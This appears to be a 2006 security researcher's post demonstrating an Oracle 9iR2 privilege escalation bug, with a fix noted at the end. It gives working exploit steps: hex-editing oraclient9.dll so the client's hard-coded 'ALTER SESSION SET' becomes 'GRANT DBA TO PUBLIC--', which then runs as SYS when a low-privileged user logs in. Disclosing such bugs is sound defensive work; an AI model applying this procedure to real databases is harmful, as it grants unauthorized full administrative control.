Demonstrating the ALTER SESSSION
bug reported by Imperva – December 28th
2006-12-28 paul.wright@orasec.com
http://www.imperva.com/application_defense_center/papers/oracle-dbms-01172006.html
The bug is that client SQL for setting up the session environment for language uses a hard coded ALTER SESSSION statement that can be changed using a hexeditor to an arbitrary SQL statement. This SQL will run on the server as SYS when the client logs on…even if the logon from the client is a low privileged account.
- Install database Oracle
database 9iR2
http://www.oracle.com/technology/software/products/oracle9i/htdocs/winsoft.html
- Create a low
privileged user
create user userexample identified by userexample
default tablespace users
temporary tablespace temp;
grant create session to userexample;
grant connect to userexample;
grant resource to userexample;
alter user userexample quota unlimited on users;
- Edit the Oracle client .dll to grant dba to PUBLIC ROLE instead of just changing the session. You will find the oraclient9.dll in oracle_home/bin
Use a hexeditor such as ultraedit and search for the alter session statement below.
Then change SQL from “ALTER SESSION SET” to “GRANT DBA TO PUBLIC--"
When you save the file you will be prompted by Ultraedit to change the name of the file as Windows does not want you to overwrite the .dll. Rename the old file and then you can give the new file the original name. It is a good idea to back up the original in a separate folder so you can go back if you make a mistake.
- Connect as the low privileged user
Sqlplus> conn userexample/userexample@dbname;
This will run the SQL in the oraclient9.dll
Log out and back in again and PUBLIC will now be DBA.
This is working and tested as above.
The solution is to install the January 2006 CPU and do not forget catcpu.sql at the end of the patch installation process.
More details to come in my new book.
http://www.rampant-books.com/book_2007_1_oracle_forensics.htm and discussion at my blog http://orasec.blogspot.com/
END.